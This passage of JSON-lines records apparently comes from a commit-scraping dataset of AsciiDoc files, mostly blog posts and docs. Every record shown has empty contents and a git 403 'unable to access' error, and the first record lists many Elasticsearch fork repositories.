csearch,huypx1292\/elasticsearch,elancom\/elasticsearch,diendt\/elasticsearch,fooljohnny\/elasticsearch,onegambler\/elasticsearch,queirozfcom\/elasticsearch,HarishAtGitHub\/elasticsearch,JackyMai\/elasticsearch,EasonYi\/elasticsearch,MjAbuz\/elasticsearch,truemped\/elasticsearch,xpandan\/elasticsearch,rhoml\/elasticsearch,lightslife\/elasticsearch,andrestc\/elasticsearch,javachengwc\/elasticsearch,mortonsykes\/elasticsearch,mute\/elasticsearch,jbertouch\/elasticsearch,yongminxia\/elasticsearch,vroyer\/elasticassandra,ulkas\/elasticsearch,pritishppai\/elasticsearch,lydonchandra\/elasticsearch,Ansh90\/elasticsearch,KimTaehee\/elasticsearch,jprante\/elasticsearch,fernandozhu\/elasticsearch,knight1128\/elasticsearch,luiseduardohdbackup\/elasticsearch,szroland\/elasticsearch,robin13\/elasticsearch,xingguang2013\/elasticsearch,infusionsoft\/elasticsearch,avikurapati\/elasticsearch,zhiqinghuang\/elasticsearch,kenshin233\/elasticsearch,polyfractal\/elasticsearch,wuranbo\/elasticsearch,mute\/elasticsearch,yuy168\/elasticsearch,obourgain\/elasticsearch,Brijeshrpatel9\/elasticsearch,adrianbk\/elasticsearch,masterweb121\/elasticsearch,wangtuo\/elasticsearch,mbrukman\/elasticsearch,snikch\/elasticsearch,Shepard1212\/elasticsearch,wbowling\/elasticsearch,glefloch\/elasticsearch,petabytedata\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,mcku\/elasticsearch,a2lin\/elasticsearch,franklanganke\/elasticsearch,jango2015\/elasticsearch,loconsolutions\/elasticsearch,fooljohnny\/elasticsearch,hydro2k\/elasticsearch,coding0011\/elasticsearch,lmtwga\/elasticsearch,njlawton\/elasticsearch,btiernay\/elasticsearch,mrorii\/elasticsearch,weipinghe\/elasticsearch,drewr\/elasticsearch,btiernay\/elasticsearch,pranavraman\/elasticsearch,diendt\/elasticsearch,zeroctu\/elasticsearch,andrejserafim\/elasticsearch,kcompher\/elasticsearch,JSCooke\/elasticsearch,JervyShi\/elasticsearch,Ansh90\/elasticsearch,tahaemin\/elasticsearch,sarwarbhuiyan\/elasticsearch,luiseduardohdbackup\/elasticsearch,spiegela\/elasticsearch,lchennup\/elasticsearch,gmarz\/elasticsearch,hafkensite\/elasticsearch,fernandozhu\/elasticsearch,jpountz\/elasticsearch,wimvds\/elasticsearch,iamjakob\/elasticsearch,likaiwalkman\/elasticsearch,abibell\/elasticsearch,franklanganke\/elasticsearch,jango2015\/elasticsearch,kenshin233\/elasticsearch,mnylen\/elasticsearch,Collaborne\/elasticsearch,ZTE-PaaS\/elasticsearch,elasticdog\/elasticsearch,queirozfcom\/elasticsearch,mmaracic\/elasticsearch,zkidkid\/elasticsearch,HarishAtGitHub\/elasticsearch,btiernay\/elasticsearch,kimimj\/elasticsearch,achow\/elasticsearch,EasonYi\/elasticsearch,elancom\/elasticsearch,lydonchandra\/elasticsearch,bestwpw\/elasticsearch,ckclark\/elasticsearch,MisterAndersen\/elasticsearch,lightslife\/elasticsearch,andrejserafim\/elasticsearch,mcku\/elasticsearch,rmuir\/elasticsearch,jimhooker2002\/elasticsearch,hanswang\/elasticsearch,TonyChai24\/ESSource,jbertouch\/elasticsearch,davidvgalbraith\/elasticsearch,winstonewert\/elasticsearch,andrestc\/elasticsearch,kcompher\/elasticsearch,YosuaMichael\/elasticsearch,xingguang2013\/elasticsearch,strapdata\/elassandra5-rc,mrorii\/elasticsearch,mrorii\/elasticsearch,ydsakyclguozi\/elasticsearch,kenshin233\/elasticsearch,tahaemin\/elasticsearch,davidvgalbraith\/elasticsearch,smflorentino\/elasticsearch,fooljohnny\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,xuzha\/elasticsearch,TonyChai24\/ESSource,tkssharma\/elasticsearch,schonfeld\/elasticsearch,humandb\/elasticsearch,achow\/elasticsearch,sneivandt\/elasticsearch,MetSystem\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,mm0\/elasticsearch,Uiho\/elasticsearch,iantruslove\/elasticsearch,rmuir\/elasticsearch,overcome\/elasticsearch,Charlesdong\/elasticsearch,adrianbk\/elasticsearch,ImpressTV\/elasticsearch,diendt\/elasticsearch,sc0ttkclark\/elasticsearch,Uiho\/elasticsearch,abibell\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,xpandan\/elasticsearch,henakamaMSFT\/elasticsearch,markwalkom\/elasticsearch,rmuir\/elasticsearch,cnfire\/elasticsearch-1,springning\/elasticsearch,dylan8902\/elasticsearch,luiseduardohdbackup\/elasticsearch,apepper\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,cwurm\/elasticsearch,dpursehouse\/elasticsearch,strapdata\/elassandra-test,nomoa\/elasticsearch,GlenRSmith\/elasticsearch,tsohil\/elasticsearch,mute\/elasticsearch,ckclark\/elasticsearch,kubum\/elasticsearch,beiske\/elasticsearch,umeshdangat\/elasticsearch,Fsero\/elasticsearch,infusionsoft\/elasticsearch,wimvds\/elasticsearch,smflorentino\/elasticsearch,MichaelLiZhou\/elasticsearch,lzo\/elasticsearch-1,kcompher\/elasticsearch,EasonYi\/elasticsearch,hirdesh2008\/elasticsearch,nknize\/elasticsearch,achow\/elasticsearch,likaiwalkman\/elasticsearch,djschny\/elasticsearch,myelin\/elasticsearch,mapr\/elasticsearch,socialrank\/elasticsearch,F0lha\/elasticsearch,liweinan0423\/elasticsearch,JSCooke\/elasticsearch,MisterAndersen\/elasticsearch,pritishppai\/elasticsearch,MjAbuz\/elasticsearch,kenshin233\/elasticsearch,camilojd\/elasticsearch,ricardocerq\/elasticsearch,dpursehouse\/elasticsearch,snikch\/elasticsearch,umeshdangat\/elasticsearch,hirdesh2008\/elasticsearch,kevinkluge\/elasticsearch,wangtuo\/elasticsearch,nellicus\/elasticsearch,nilabhsagar\/elasticsearch,Collaborne\/elasticsearch,18098924759\/elasticsearch,hafkensite\/elasticsearch,kaneshin\/elasticsearch,pranavraman\/elasticsearch,TonyChai24\/ESSource,jeteve\/elasticsearch,iantruslove\/elasticsearch,MaineC\/elasticsearch,kubum\/elasticsearch,truemped\/elasticsearch,pritishppai\/elasticsearch,PhaedrusTheGreek\/elasticsearch,acchen97\/elasticsearch,xuzha\/elasticsearch,PhaedrusTheGreek\/elasticsearch,schonfeld\/elasticsearch,ckclark\/elasticsearch,linglaiyao1314\/elasticsearch,qwerty4030\/elasticsearch,areek\/elasticsearch,strapdata\/elassandra-test,geidies\/elasticsearch,yuy168\/elasticsearch,nknize\/elasticsearch,lightslife\/elasticsearch,linglaiyao1314\/elasticsearch,achow\/elasticsearch,fooljohnny\/elasticsearch,jchampion\/elasticsearch,socialrank\/elasticsearch,i-am-Nathan\/elasticsearch,achow\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,Kakakakakku\/elasticsearch,jchampion\/elasticsearch,markwalkom\/elasticsearch,linglaiyao1314\/elasticsearch,ImpressTV\/elasticsearch,himanshuag\/elasticsearch,kingaj\/elasticsearch,sposam\/elasticsearch,weipinghe\/elasticsearch,polyfractal\/elasticsearch,zhiqinghuang\/elasticsearch,mute\/elasticsearch,Liziyao\/elasticsearch,yuy168\/elasticsearch,HarishAtGitHub\/elasticsearch,jimhooker2002\/elasticsearch,MisterAndersen\/elasticsearch,acchen97\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,shreejay\/elasticsearch,SergVro\/elasticsearch,Widen\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,YosuaMichael\/elasticsearch,markllama\/elasticsearch,kunallimaye\/elasticsearch,glefloch\/elasticsearch,fekaputra\/elasticsearch,sreeramjayan\/elasticsearch,apepper\/elasticsearch,nezirus\/elasticsearch,lzo\/elasticsearch-1,beiske\/elasticsearch,markharwood\/elasticsearch,huanzhong\/elasticsearch,karthikjaps\/elasticsearch,JackyMai\/elasticsearch,wittyameta\/elasticsearch,likaiwalkman\/elasticsearch,tahaemin\/elasticsearch,Brijeshrpatel9\/elasticsearch,s1monw\/elasticsearch,18098924759\/elasticsearch,markllama\/elasticsearch,KimTaehee\/elasticsearch,uschindler\/elasticsearch,hafkensite\/elasticsearch,dylan8902\/elasticsearch,sc0ttkclark\/elasticsearch,lmtwga\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra-test,mjhennig\/elasticsearch,LeoYao\/elasticsearch,kunallimaye\/elasticsearch,TonyChai24\/ESSource,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,KimTaehee\/elasticsearch,maddin2016\/elasticsearch,Widen\/elasticsearch,mikemccand\/elasticsearch,Collaborne\/elasticsearch,MichaelLiZhou\/elasticsearch,JSCooke\/elasticsearch,kingaj\/elasticsearch,knight1128\/elasticsearch,coding0011\/elasticsearch,truemped\/elasticsearch,Stacey-Gammon\/elasticsearch,djschny\/elasticsearch,socialrank\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fforbeck\/elasticsearch,rento19962\/elasticsearch,vietlq\/elasticsearch,queirozfcom\/elasticsearch,Uiho\/elasticsearch,wuranbo\/elasticsearch,zhiqinghuang\/elasticsearch,xpandan\/elasticsearch,sneivandt\/elasticsearch,Liziyao\/elasticsearch,henakamaMSFT\/elasticsearch,jpountz\/elasticsearch,ivansun1010\/elasticsearch,mbrukman\/elasticsearch,qwerty4030\/elasticsearch,mbrukman\/elasticsearch,dataduke\/elasticsearch,karthikjaps\/elasticsearch,scorpionvicky\/elasticsearch,Shekharrajak\/elasticsearch,sreeramjayan\/elasticsearch,szroland\/elasticsearch,PhaedrusTheGreek\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,mjhennig\/elasticsearch,xuzha\/elasticsearch,Shekharrajak\/elasticsearch,artnowo\/elasticsearch,aglne\/elasticsearch,LewayneNaidoo\/elasticsearch,sposam\/elasticsearch,franklanganke\/elasticsearch,strapdata\/elassandra,sc0ttkclark\/elasticsearch,naveenhooda2000\/elasticsearch,ImpressTV\/elasticsearch,schonfeld\/elasticsearch,karthikjaps\/elasticsearch,humandb\/elasticsearch,vietlq\/elasticsearch,NBSW\/elasticsearch,sposam\/elasticsearch,jango2015\/elasticsearch,MichaelLiZhou\/elasticsearch,kalburgimanjunath\/elasticsearch,naveenhooda2000\/elasticsearch,Kakakakakku\/elasticsearch,koxa29\/elasticsearch,shreejay\/elasticsearch,nomoa\/elasticsearch,onegambler\/elasticsearch,nellicus\/elasticsearch,girirajsharma\/elasticsearch,brandonkearby\/elasticsearch,cnfire\/elasticsearch-1,lks21c\/elasticsearch,NBSW\/elasticsearch,sdauletau\/elasticsearch,xingguang2013\/elasticsearch,masaruh\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mortonsykes\/elasticsearch,MjAbuz\/elasticsearch,NBSW\/elasticsearch,gfyoung\/elasticsearch,Fsero\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"858bb15d61ace1842ab154c197ef0a91f5298cd1","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d578ec7fc688bceebedb5cf4ca2bc3ec3a5e54d1","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71dcf8d30df27f87232aea3dd5883ec99e902aa1","subject":"Update 2011-10-112-Peak-Java.adoc","message":"Update 2011-10-112-Peak-Java.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2011-10-112-Peak-Java.adoc","new_file":"_posts\/2011-10-112-Peak-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"294dc76d1d05cffff20943be1597f5272411028f","subject":"Update 2016-10-20-some-words.adoc","message":"Update 2016-10-20-some-words.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2016-10-20-some-words.adoc","new_file":"_posts\/2016-10-20-some-words.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8301d1cee39d8812ef2ceca436d8d9dc1754cc5a","subject":"Update 2015-06-30-slack-stamp.adoc","message":"Update 2015-06-30-slack-stamp.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-30-slack-stamp.adoc","new_file":"_posts\/2015-06-30-slack-stamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"675117697c84189f65dd74915386d315ec17ebb9","subject":"Update 2015-11-14-Programacao.adoc","message":"Update 2015-11-14-Programacao.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-14-Programacao.adoc","new_file":"_posts\/2015-11-14-Programacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe98fe2f5d42355bd796b387ef52ea35a338a70d","subject":"Update 2016-08-20-hello-world.adoc","message":"Update 2016-08-20-hello-world.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-20-hello-world.adoc","new_file":"_posts\/2016-08-20-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7eb354196f12d3443ab4d5353173321af3eef00","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fe9bb88ef0294cadd3bb0f5ad8e96949040dd27","subject":"y2b create post The Music Wrap - Does It Suck?","message":"y2b create post The Music Wrap - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-07-The-Music-Wrap--Does-It-Suck.adoc","new_file":"_posts\/2017-04-07-The-Music-Wrap--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e1a2085e47ee7c9759b62bcc629354ad4648344","subject":"Update 2016-02-10-2-am.adoc","message":"Update 2016-02-10-2-am.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-10-2-am.adoc","new_file":"_posts\/2016-02-10-2-am.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b712afd6edaa108a43edf082833eea42e64c55ec","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"004d303cb77b89160c0499af2b7c4bb5cfb8df6a","subject":"y2b create post How To KILL The Samsung Bixby Button...","message":"y2b create post How To KILL The Samsung Bixby Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-19-How-To-KILL-The-Samsung-Bixby-Button.adoc","new_file":"_posts\/2017-09-19-How-To-KILL-The-Samsung-Bixby-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7a02bfe806a4caa50fad9f52a29a7247151effd","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5844573508aeb568d690a7be48934e28121921c","subject":"Update 2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e248a6715810d51914158b19d118932fd79fc3e7","subject":"Update 2015-05-23-test.adoc","message":"Update 2015-05-23-test.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-23-test.adoc","new_file":"_posts\/2015-05-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47d203b7eb1449b960aad6aea11bdc4fd6760e6a","subject":"Convert double quotes to backticks","message":"Convert double quotes to backticks\n\nThis is primarely intended to test a new script an my server... :)\n","repos":"rumpelsepp\/snap","old_file":"man\/snap.1.adoc","new_file":"man\/snap.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/snap.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adedd9833cccdf669fd6e9116fc950700a838587","subject":"Added author","message":"Added author\n","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"643a5260e8be5b980fcb42dfbde5a43182465d4d","subject":"y2b create post Any Color iPhone 7 Plus... But How?","message":"y2b create post Any Color iPhone 7 Plus... But How?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-01-Any-Color-iPhone-7-Plus-But-How.adoc","new_file":"_posts\/2017-04-01-Any-Color-iPhone-7-Plus-But-How.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ed096bb142e4c4f6b540a0be4cb628b87b25c8","subject":"Renamed '_posts\/2017-09-30-Front-end-web-developer-courses.adoc' to '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc'","message":"Renamed '_posts\/2017-09-30-Front-end-web-developer-courses.adoc' to '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc'","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc","new_file":"_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44ad10ee119c611d4e42ee630e72905f13600266","subject":"Fix after merge conflicts","message":"Fix after merge conflicts\n","repos":"RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j","old_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f260939ccf55368dfbeb7f5d7abcf923bb5885e5","subject":"Fix #630","message":"Fix #630\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe84f6ec532c2d875357f76c73eb5f147b789a04","subject":"Add alternative description","message":"Add alternative description\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6a971f05d7cb7a908d27552a4cdc25e0c41e2dff","subject":"Doc : add HTTP headers documentation","message":"Doc : add HTTP headers documentation\n","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/doc.adoc","new_file":"src\/docs\/asciidoc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64171245964da91c6ae4ffd24d8b14b4340d7f87","subject":"Update 2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","message":"Update 2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","new_file":"_posts\/2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b831570d086e73a7c2f0046403c579061dc61422","subject":"Update 2016-11-13-Proof-by-Induction.adoc","message":"Update 2016-11-13-Proof-by-Induction.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-13-Proof-by-Induction.adoc","new_file":"_posts\/2016-11-13-Proof-by-Induction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0297640d43bdb6aea6a9916a7aa6f313a1d16106","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de00378f40c272db54e8bef4e15ae54b938da2d8","subject":"Delete the file at '_posts\/2017-05-28-Naming-Conventions.adoc'","message":"Delete the file at '_posts\/2017-05-28-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e3c12c83ab299ded98a2ebf90578b737f7e7bee","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e62382195326ca90586427bb8378bdee5d12c501","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"010c8b56f433fecc913c8569785adea3ed5808a8","subject":"Update 2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","message":"Update 